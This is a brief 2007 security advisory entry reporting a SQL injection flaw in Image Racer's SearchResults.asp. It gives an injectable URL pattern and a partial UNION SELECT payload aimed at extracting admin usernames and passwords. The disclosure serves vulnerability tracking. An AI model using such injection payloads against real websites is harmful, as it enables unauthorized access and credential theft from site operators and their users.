[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

2007-07-23T00:00:00
ID SECURITYVULNS:DOC:17578
Type securityvulns
Reporter Securityvulns
Modified 2007-07-23T00:00:00

Description


Aria-Security Team


Image Racer SearchResults.asp SQL Injection Vendor: http://www.junctionquest.com/Software.asp

Example: http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example : -1 'union select username,password from admin where [FIND IT YOUR SELF]=1


Credits: Aria-Security Team http://aria-security.net/ Personal Blog: http://outlaw.aria-security.info